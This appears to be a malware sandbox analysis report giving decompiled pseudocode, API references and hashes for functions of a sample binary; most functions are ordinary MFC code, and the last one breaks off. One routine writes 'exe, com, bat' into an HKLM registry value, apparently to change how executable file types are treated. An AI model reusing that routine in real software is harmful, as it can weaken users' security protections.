Opcode Fuzzy Hash: c09a520e972cbed81c92c8a8f446ce9723face874d1e5d1072ee138f9bd11dab
Instruction Fuzzy Hash: F3915AB49021189BEB15DF69CD51BEEB7B1AF88308F0041EDE50967382DB786E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040619F, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E0040619F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				struct HWND__* _t76;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E0041F71D(E00431E1E, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E0040DB94(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E0040DB94(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E0040C572(_t103, _t104, 0, _t129, _t136, 0x10); // executed
				E0040C572(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E0041F7C2(_t65);
					}
					E0040320E(_t132 - 0x1c, E0040EA5E());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E00410CB1(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x4465cc; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E0040B748(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t76 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E00405BFB, 0); // executed
							_t131 = _t76;
							E00403036( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E00409D3F(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E00410C7A(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E00410BD8(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E004108F1(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E004108E3(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E00406177(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

0x0040619f
0x0040619f
0x0040619f
0x0040619f
0x004061a6
0x004061ab
0x004061ad
0x004061b2
0x004061b5
0x004061bf
0x004061bf
0x004061c7
0x004061cc
0x004061cf
0x004061d2
0x004061d5
0x004061df
0x004061e6
0x00406213
0x00406216
0x00406216
0x00406218
0x004061fa
0x004061fa
0x00406387
0x0040638c
0x0040638c
0x00406223
0x00406231
0x00406235
0x00406242
0x00406247
0x0040624d
0x0040624f
0x00406285
0x00406285
0x00406287
0x004062c8
0x004062c8
0x004062cc
0x004062d1
0x004062d6
0x004062d9
0x004062db
0x004062e1
0x004062dd
0x004062dd
0x004062dd
0x004062ef
0x004062fb
0x004062fd
0x00406302
0x00406324
0x00406327
0x00406329
0x00406331
0x00406334
0x00406336
0x0040633d
0x0040633d
0x00406336
0x00406343
0x00406348
0x0040634a
0x00406350
0x00406350
0x00406356
0x00406358
0x0040635a
0x0040635e
0x00406361
0x00406367
0x00406367
0x00406367
0x0040635e
0x00406369
0x0040636c
0x00406371
0x0040637a
0x0040637a
0x00406382
0x00406384
0x00406384
0x00406384
0x00000000
0x00406384
0x00406289
0x0040628d
0x00406298
0x0040629c
0x004062ac
0x004062af
0x004062b3
0x004062b8
0x004062bb
0x004062c6
0x004062c6
0x00000000
0x004062bb
0x00406251
0x00406253
0x00000000
0x00000000
0x0040625d
0x0040625f
0x00000000
0x00000000
0x00406269
0x00406270
0x00406275
0x00406277
0x00406279
0x00000000
0x00000000
0x0040627b
0x00406280
0x00406282
0x00406282
0x00000000
0x00406280
0x004061ed
0x004061f8
0x0040620f
0x00000000
0x0040620f
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 004061A6
GetSystemMetrics.USER32 ref: 00406257
GlobalLock.KERNEL32 ref: 004062C0
CreateDialogIndirectParamA.USER32(?,?,?,00405BFB,00000000), ref: 004062EF

Strings

MS Shell Dlg, xrefs: 00406261

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: 3e4b4bade944808363b2727e551b547ef92d40d9d0212ec3b94de52b8e46ff9f
Instruction ID: 0bc490b1034fbbaea528403df064128feb745a9c2e9583e38ab2a070d1ec2b36
Opcode Fuzzy Hash: 3e4b4bade944808363b2727e551b547ef92d40d9d0212ec3b94de52b8e46ff9f
Instruction Fuzzy Hash: B651BE309002059BCF15EFA4C8859EEBBB4AF44314F15427EF812B72D1DB789A95CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004025F0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004025F0(intOrPtr __ecx, CHAR* _a4) {
				void* _v8;
				int _v12;
				long _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				long _t28;
				int _t31;
				long _t34;
				char* _t38;
				char* _t41;
				char* _t44;

				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t41 =  *0x442000; // 0x4346d4
				_v16 = RegCreateKeyExA(0x80000002, _t41, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
				if(_v16 == 0) {
					_v24 = 0x800;
					E0041EB60(_a4, "exe, com, bat");
					_t38 =  *0x442010; // 0x43465c
					_t28 = RegQueryValueExA(_v8, _t38, 0,  &_v20, _a4,  &_v24); // executed
					_v16 = _t28;
					if(_v16 != 0) {
						_t31 = lstrlenA(_a4);
						_t44 =  *0x442010; // 0x43465c
						_t34 = RegSetValueExA(_v8, _t44, 0, 1, _a4, _t31 + 1); // executed
						_v16 = _t34;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x004025f6
0x004025f9
0x00402600
0x0040261c
0x0040262e
0x00402635
0x00402637
0x00402647
0x0040265d
0x00402668
0x0040266e
0x00402675
0x0040267b
0x0040268d
0x00402698
0x0040269e
0x0040269e
0x004026a5
0x004026a5
0x004026b1

APIs

RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00401638), ref: 00402628
_strcat.LIBCMT ref: 00402647
RegQueryValueExA.KERNELBASE(00000000,0043465C,00000000,?,00401638,00000800), ref: 00402668
lstrlenA.KERNEL32(00401638), ref: 0040267B
RegSetValueExA.KERNELBASE(00000000,0043465C,00000000,00000001,00401638,-00000001), ref: 00402698
RegCloseKey.ADVAPI32(00000000), ref: 004026A5

Strings

\FC, xrefs: 0040265D, 0040268D
exe, com, bat, xrefs: 0040263E

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Value$CloseCreateQuery_strcatlstrlen
String ID: \FC$exe, com, bat
API String ID: 1958970598-4041655066
Opcode ID: 1831c4f7d6f73dd4213caa599944f0336715ca713a20f07bf892c109c3f6860d
Instruction ID: 0991be1bcda026a765b55682184bd2232a476c29beda41f33cbd04d81c06e64f
Opcode Fuzzy Hash: 1831c4f7d6f73dd4213caa599944f0336715ca713a20f07bf892c109c3f6860d
Instruction Fuzzy Hash: F4212CB9E00208FBDB14CFD4DD49FEEB7B8AB48701F108459FA15A7280D6796A04CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF65, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040EF65(void* __ecx) {
				int _t5;
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t19 + 8)) = _t5;
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x446578 = GetSystemMetrics(2) + 1;
				 *0x44657c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x0040ef70
0x0040ef72
0x0040ef76
0x0040ef7d
0x0040ef85
0x0040ef8f
0x0040efa0
0x0040efaa
0x0040efb2
0x0040efbe

APIs

KiUserCallbackDispatcher.NTDLL ref: 0040EF72
GetSystemMetrics.USER32 ref: 0040EF79
GetSystemMetrics.USER32 ref: 0040EF80
GetSystemMetrics.USER32 ref: 0040EF8A
GetDC.USER32(00000000), ref: 0040EF94
GetDeviceCaps.GDI32(00000000,00000058), ref: 0040EFA5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040EFAD
ReleaseDC.USER32 ref: 0040EFB5

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: 994e65a5f7cf09011eb91012667e9cd424a14e7951b27da859b39b4ce86ef113
Instruction ID: 97755fa7e18ea7b352d67f311e11813537151e1edd7cb95964a28bf73efd48b3
Opcode Fuzzy Hash: 994e65a5f7cf09011eb91012667e9cd424a14e7951b27da859b39b4ce86ef113
Instruction Fuzzy Hash: 59F09070A40700AEE3206F72AC49F677BB4EBC6B62F01443AE6518B2D0C7B5A8018F54

Uniqueness

Uniqueness Score: -1.00%

Function 0041ACA9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0041ACA9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				signed int _t11;
				void* _t14;
				intOrPtr _t17;
				void* _t18;
				struct HINSTANCE__* _t19;
				void* _t31;
				intOrPtr _t35;
				void* _t36;
				void* _t38;

				_t38 = __eflags;
				_t32 = __edi;
				_t31 = __edx;
				_t25 = __ebx;
				_t11 = SetErrorMode(0); // executed
				SetErrorMode(_t11 | 0x00008001); // executed
				_t14 = E0040DB94(__ebx, __edi, SetErrorMode, _t38);
				_t35 = _a4;
				 *((intOrPtr*)(_t14 + 8)) = _t35;
				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
				E0040D3F7(_t14);
				_t17 =  *((intOrPtr*)(E0040DB94(__ebx, __edi, _t35, _t38) + 4));
				_t39 = _t17;
				if(_t17 != 0) {
					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
					E0041AB2A(_t17, _t31, _t39);
				}
				_t18 = E0040DB94(_t25, _t32, _t35, _t39);
				_t40 =  *((char*)(_t18 + 0x14));
				_pop(_t36);
				if( *((char*)(_t18 + 0x14)) == 0) {
					E004051C9(_t36, _t40);
				}
				_t19 = GetModuleHandleA("user32.dll");
				if(_t19 != 0) {
					 *0x4462a4 = GetProcAddress(_t19, "NotifyWinEvent");
				}
				return 1;
			}

0x0041aca9
0x0041aca9
0x0041aca9
0x0041aca9
0x0041acb2
0x0041acba
0x0041acbc
0x0041acc1
0x0041acc7
0x0041acca
0x0041accd
0x0041acd7
0x0041acda
0x0041acdc
0x0041ace2
0x0041ace9
0x0041acee
0x0041acf1
0x0041acf1
0x0041acf6
0x0041acfb
0x0041acff
0x0041ad00
0x0041ad02
0x0041ad02
0x0041ad0c
0x0041ad14
0x0041ad22
0x0041ad22
0x0041ad2a

APIs

SetErrorMode.KERNELBASE(00000000), ref: 0041ACB2
SetErrorMode.KERNELBASE(00000000), ref: 0041ACBA

Part of subcall function 0040D3F7: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040D438
Part of subcall function 0040D3F7: SetLastError.KERNEL32(0000006F), ref: 0040D452

GetModuleHandleA.KERNEL32(user32.dll), ref: 0041AD0C
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0041AD1C

Part of subcall function 0041AB2A: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041AB6D
Part of subcall function 0041AB2A: PathFindExtensionA.KERNELBASE(?), ref: 0041AB87
Part of subcall function 0041AB2A: __strdup.LIBCMT ref: 0041ABC9

Strings

user32.dll, xrefs: 0041AD07
NotifyWinEvent, xrefs: 0041AD16

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ErrorModule$FileModeName$AddressExtensionFindHandleLastPathProc__strdup
String ID: NotifyWinEvent$user32.dll
API String ID: 2454351968-597752486
Opcode ID: 616ad4c1b5ded26846f479a85218188d3b388f4c8ca7b456c2135a77635ce7eb
Instruction ID: f2694494a373e7eb832031faae720e4f62f99ff10030d8dbc4a867b38e11be65
Opcode Fuzzy Hash: 616ad4c1b5ded26846f479a85218188d3b388f4c8ca7b456c2135a77635ce7eb
Instruction Fuzzy Hash: 4B01D470A007504FC710EF75D405A5A3BA4AF48700F06846FF444A7392EB38E844CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C572, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040C572(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t173;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E0040DB94(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E0041F330(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E0040DB94(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x4465b8; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E0040C38E(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E0040C38E(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E0040C38E(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E0040C531(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E0040C531(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t173 = E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0); // executed
					_t201 = _t201 | _t173;
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

0x0040c572
0x0040c578
0x0040c57d
0x0040c585
0x0040c585
0x0040c588
0x00000000
0x0040c58c
0x0040c592
0x0040c593
0x0040c594
0x0040c59e
0x0040c5a0
0x0040c5ad
0x0040c5b0
0x0040c5b5
0x0040c5be
0x0040c5c1
0x0040c5c6
0x0040c5c7
0x0040c5ca
0x0040c5cd
0x0040c5d2
0x0040c5d3
0x0040c5da
0x0040c5e1
0x0040c5e6
0x0040c5e8
0x0040c5ea
0x0040c5ea
0x0040c5ea
0x0040c5e8
0x0040c5eb
0x0040c5ef
0x0040c5f1
0x0040c5fb
0x0040c5fc
0x0040c603
0x0040c608
0x0040c60a
0x0040c60c
0x0040c60c
0x0040c60c
0x0040c60a
0x0040c60f
0x0040c613
0x0040c618
0x0040c619
0x0040c61c
0x0040c623
0x0040c62a
0x0040c62f
0x0040c631
0x0040c633
0x0040c633
0x0040c633
0x0040c631
0x0040c636
0x0040c63a
0x0040c64a
0x0040c64d
0x0040c650
0x0040c655
0x0040c657
0x0040c659
0x0040c659
0x0040c659
0x0040c657
0x0040c65c
0x0040c65f
0x0040c66f
0x0040c676
0x0040c67d
0x0040c682
0x0040c684
0x0040c686
0x0040c686
0x0040c686
0x0040c684
0x0040c688
0x0040c68c
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a5
0x0040c6a5
0x0040c6a5
0x0040c6a5
0x0040c6ac
0x0040c6b0
0x0040c6b8
0x0040c6c4
0x0040c6c4
0x0040c6c4
0x0040c6c6
0x0040c6ca
0x0040c6d5
0x0040c6e1
0x0040c6e1
0x0040c6e1
0x0040c6e8
0x0040c6eb
0x0040c6f2
0x0040c6fa
0x0040c6fa
0x0040c6fa
0x0040c701
0x0040c704
0x0040c70b
0x0040c717
0x0040c717
0x0040c717
0x0040c71e
0x0040c721
0x0040c728
0x0040c734
0x0040c734
0x0040c734
0x0040c73b
0x0040c73e
0x0040c745
0x0040c751
0x0040c751
0x0040c751
0x0040c758
0x0040c75b
0x0040c762
0x0040c76e
0x0040c76e
0x0040c76e
0x0040c775
0x0040c778
0x0040c77f
0x0040c78b
0x0040c78b
0x0040c78b
0x0040c792
0x0040c795
0x0040c79c
0x0040c7a4
0x0040c7a4
0x0040c7a4
0x0040c7ab
0x0040c7ae
0x0040c7b5
0x0040c7bd
0x0040c7bd
0x0040c7bd
0x0040c7c4
0x0040c7c7
0x0040c7ce
0x0040c7da
0x0040c7da
0x0040c7da
0x0040c7e1
0x0040c7e4
0x0040c7eb
0x0040c7f7
0x0040c7f7
0x0040c7f7
0x0040c7fe
0x0040c801
0x0040c808
0x0040c810
0x0040c810
0x0040c810
0x0040c812
0x0040c815
0x0040c818
0x0040c824
0x0040c826
0x0040c82b
0x0040c82e
0x0040c82e
0x0040c82e
0x0040c83d
0x0040c83f
0x0040c83f
0x00000000

APIs

_memset.LIBCMT ref: 0040C5A0

Strings

@, xrefs: 0040C745
AfxFrameOrView80s, xrefs: 0040C666
AfxMDIFrame80s, xrefs: 0040C641
@, xrefs: 0040C6AC

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: af90f3d793df6aa5d0f43c2ff2de7d4dbca73bf6dbea27fcc50b6289e62f7852
Instruction ID: e6b970e612583588a719d793e0dd92c83582657bdf5cb49032b9efa87aaaa162
Opcode Fuzzy Hash: af90f3d793df6aa5d0f43c2ff2de7d4dbca73bf6dbea27fcc50b6289e62f7852
Instruction Fuzzy Hash: C3810171D00219AADB50DFA4C4C5BDEBBF9AF08344F24817AF914F62C1E7789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 022567ED, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E022567ED() {
				char _v524;
				void* _v528;
				char _v536;
				void* _v544;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t21;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t33;
				void* _t34;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t60;
				short* _t61;
				void* _t64;

				_t34 = _v528;
				_t11 = 0x2b1f137a;
				_t61 = 0;
				goto L1;
				do {
					while(1) {
						L1:
